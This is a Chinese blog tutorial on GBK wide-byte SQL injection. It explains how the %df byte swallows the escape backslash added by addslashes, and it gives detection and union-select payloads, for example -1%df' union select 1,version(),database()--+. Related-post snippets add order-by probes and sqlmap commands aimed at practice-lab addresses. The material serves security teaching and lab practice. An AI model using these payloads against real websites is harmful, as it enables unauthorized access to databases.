SQL 注入漏洞（十一）宽字节注入

Aτθ

已于 2022-06-20 23:43:14 修改

阅读量744

点赞数 1

分类专栏： OWASP TOP10 文章标签： web安全

于 2022-06-20 22:53:11 首次发布

本文链接：https://blog.csdn.net/weixin_51730169/article/details/125382213

版权

OWASP TOP10 专栏收录该内容

51 篇文章 20 订阅

订阅专栏

一、宽字节注入

在 SQL 进行防注入的时候，一般会开启 gpc，过滤特殊字符。一般情况下开启 gpc 是可以防御很多字符串型的注入，但是如果数据库编码
不对，也可以导致 SQL 防注入绕过，达到注入的目的。如果数据库设置宽字节字符集 gbk 会导致宽字节注入，从而逃逸gpc。

1、前提条件

简单理解:数据库编码与 PHP 编码设置为不同的两个编码，就有可能产生宽字节注入。
深入讲解：要有宽字节注入漏洞，首先要满足数据库后端使用双/多字节解析 SQL语句，其次还要保证在该种字符集范围中包含低字节位是
0x5C(01011100) 的字符，初步的测试结果 Big5 和 GBK 字符集都是有的， UTF-8 和 GB2312 没有这种字符（也就不存在宽字节
注入）。

gpc 绕过过程
%df%27===(addslashes)===>%df%5c%27===(数据库 GBK)===>運'

二、宽字节攻击

1、正常请求页面

在这里插入图片描述

2、检测漏洞

宽字节检测较为简单，输入%df' 检测即可或者使用配合 and 1=1 检测。
-1%df' and 1=1--+ 页面是否存在乱码；
-1%df' or sleep(3)--+ 页面是否存在延时；
均可以测试存在宽字节注入。

在这里插入图片描述

3、注入攻击

-1%df' union select 1,version(),database()--+

在这里插入图片描述

关注博主即可阅读全文

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

Aτθ

关注关注

1
点赞
踩
1

收藏

觉得还不错? 一键收藏
0
评论
复制链接

分享到 QQ

分享到新浪微博

扫一扫

专栏目录

【墨者学院】SQL注入漏洞测试（宽字节）

hehigoxqc606的博客

08-31

561

【墨者学院】SQL注入漏洞测试（宽字节）宽字节概述： GB2312、GBK、GB18030、BIG5、Shift_JIS等这些都是常说的宽字节，实际上只有两字节。宽字节带来的安全问题主要是吃ASCII字符(一字节)的现象，即将两个ascii字符误认为是一个宽字节字符。思路：注入点检测：使用and、or、‘，判断是否有注入，是否存在宽字节注入，是否存在http头注入以及工具检测等。注入方式：手工注入实验过程：第一步：访问靶场链接第二步：手工注入 http...

mysql 南邮ctf_宽字节注入和防御(示例代码)

weixin_42282482的博客

02-07

326

0、前言最近要为了自动化审计搜集所有PHP漏洞，在整理注入的时候，发现宽字节注入中使用iconv造成的漏洞原理没有真正搞懂，网上的文章也说得不是很清楚，于是看了荣哥(lxsec)以前发的一篇http://www.91ri.org/8611.html，加上我们两个人的讨论，最终有了这一篇深入的研究成果。1、概述主要是由于使用了宽字节编码造成的。什么是字符集？计算机显示的字符图形与保存该字符时的二进制...

参与评论您还未登录，请先登录后发表或查看评论

MySQL宽字节注入漏洞分析

HelloWeb2014的博客

03-07

8153

MySQL宽字节注入漏洞分析 By HelloWeb 2017-3-7 MySQL宽字节注入漏洞是SQL注入漏洞攻防技术相互促进的一个典型例子。 1 经典SQL注入漏洞例子1是没有任何SQL注入防护措施的PHP程序，它存在SQL注入漏洞。 <?php $name=$_GET['name']; $conn=mysql_connect('localhost','root','roo

SQL注入漏洞测试(宽字节)

qq_36933272的博客

08-31

208

1.注入类型 http://219.153.49.228:40122/new_list.php?id=-1%df’报错,判断是宽注入 2.字段数 http://219.153.49.228:40122/new_list.php?id=-1%df’ order by 5 http://219.153.49.228:40122/new_list.php?id=-1%df’ order by 6报错，得...

SQL 注入漏洞

weixin_52345129的博客

01-15

527

SQL 注入漏洞，就是通过把 SQL 命令插入到URL地址、Web 表单提交或页面请求的查询字符串中，最终达到欺骗服务器执行恶意的 SQL 命令。漏洞成因是程序没有对用户输入的内容进行安全检查，直接代入数据库进行查询，导致了 SQL 注入的发生。目前常见的 SQL 注入的攻击方式有报错注入、普通注入、隐式类型注入、盲注、宽字节注入、二次解码注入。

Sql漏洞注入之宽字节注入

Matheus的博客

07-30

601

绕过–宽字节注入攻击 宽字节注入攻击由于sql注入的盛行，不少网站管理员都意识到了这种攻击方式的厉害，纷纷想出不少办法来避免，例如使用一些 Mysql 中转义的函数 addslashes，mysql_real_escape_string， mysql_escape_string等等。其实这些函数就是为了过滤用户输入的一些数据，对特殊的字符加上反斜杠“\”进行转义。 Addslashes()函数：对get、post、cookie等传递的参数中的’、“、\、null等进行转义 mysql_real_esca

Sql注入漏洞汇总-上

最新发布

黑战士的博客

06-04

728

DNSlog注入，也叫DNS带外查询，它是属于带外通信的一种(Out of Band,简称OOB)。寻常的注入基本都是在同一个信道上面的，比如正常的get注入，先在url上插入payload做HTTP请求，然后得到HTTP返回包，没有涉及其他信道。而所谓的带外通信，至少涉及两个信道信道：在计算机中指通信的通道，是信号传输的媒介。

第十九节宽字节SQL注入-01

09-15

id=1%df%27” --search --level 3 --risk 1 --thread 10”，这个命令将检测指定URL下的宽字节SQL注入漏洞，并提供相关的漏洞信息。宽字节SQL注入攻击是一种非常危险的攻击方式，需要我们付出高度的重视。为了避免...

墨者学院-----SQL注入漏洞测试(宽字节)

qq_43590351的博客

01-23

554

SQL注入漏洞测试(宽字节) python2 sqlmap.py -u “http://chinalover.sinaapp.com/SQL-GBK/index.php?id=1%df%27” --level 3 --risk 1 --thread 10 python sqlmap.py -u http://chinalover.sinaapp.com/SQL-GBK/index.php?id=3 --tamper unmagicquotes --dbs 宽字节的注入原理 ...

墨者学院-SQL注入漏洞测试(宽字节)

臭nana的博客

12-17

503

墨者学院—SQL注入漏洞测试(宽字节)

没事我溜达

03-17

1689

靶场地址：SQL注入漏洞测试(宽字节) 本章学习点为如何绕过单引号，和遇到魔术引号时该如何进行绕过。

刷题笔记：SQL注入漏洞测试(宽字节)

m0_67399862的博客

06-05

521

刷题笔记：宽字节注入

墨者学院之SQL注入漏洞测试(宽字节)

A_dmin的博客

02-24

1300

实验吧之SQL注入漏洞测试(宽字节) 首先进入界面，找注入点，找到如下页面：由于已知是宽字节注入，直接输入： id=-1%df' 显示：那么接下来就简单了，按照union注入即可：判断字段：id=-1%df' order by 5%23(正常) id=-1%df' order by 6%23(报错) 说明只有5个字段看回显： id=-1%df' union select 1,2,...

宽字节注入讲解-墨者学院(SQL注入漏洞测试(宽字节))

T1ngSh0w的博客

09-18

5053

宽字节注入原理讲解+墨者学院(SQL注入漏洞测试(宽字节))题目详解

宽字节注入和防御

weixin_30345577的博客

03-25

1484

0、前言最近要为了自动化审计搜集所有PHP漏洞，在整理注入的时候，发现宽字节注入中使用iconv造成的漏洞原理没有真正搞懂，网上的文章也说得不是很清楚，于是看了荣哥（lxsec）以前发的一篇http://www.91ri.org/8611.html，加上我们两个人的讨论，最终有了这一篇深入的研究成果。 1、概述主要是由于使用了宽字节编码造成的。，典型情景是网站使用GBK编码，...

墨者SQL注入漏洞测试(宽字节)

wswr的博客

03-10

750

原理：就是用%df去吃掉转义字符 / ，然后就可以正常注入了思路：还是一样找注入点，过一下，就是找页面源码找注入点，然后什么get啊post什么xff什么的都试试，最后是宽字节的，所以按照题设就是在可能出现注入的页面加上 %df%27（%27 就是 ’）然后会发现报错，然后开始一步步注入咯登入找注入点通过查看页面源码（突然想到还有一种方法找注入页面，就是用F12然后去找跳转链接有没有存在注入页面，与本题无关QAQ）然后就%df%27咯，发现注入点 order by 从1..

墨者-SQL注入漏洞测试(宽字节) 题解

Redredredfish的博客

12-12

619

靶场地址：https://www.mozhe.cn/bug/detail/MEJyQWEyd29tN2ErT1VocThlaUNVdz09bW96aGUmozhe ①url:http://219.153.49.228:46231/new_list.php?id=1 单引号无法闭合，猜测用了转义，尝试宽字节注入id=1%df' %df与转义符\组合，即url编码%df%5c，mysql会识别为一个GBK编码的汉字運,并不一定非得是%df,由于ascii字符集到%7f为止，所以只要大于%7f即可与转义符组合，例

宽字节注入——漏洞记录

chick11的博客

07-07

309

宽字节注入 已知目标IP为：http://219.153.49.228:41742/new_list.php?id=1，加入单引号后页面并没有报错加上%df，可以看到页面报错，说明是单引号闭合：后面跟上正常sql注入语句即可，order by判断列数，为5时返回正常：为6时，返回报错：联合查询，看到3和5可利用：查询当前数据库和用户：查询表格：查询stormgroup_member

sql注入宽字节注入

07-28

SQL注入和宽字节注入都是常见的安全漏洞类型。下面我将简要介绍这两种注入方式。 1. SQL注入： SQL注入是一种在应用程序中利用不正确处理用户输入的漏洞，攻击者可以通过在用户输入中插入恶意的SQL代码来执行非授权...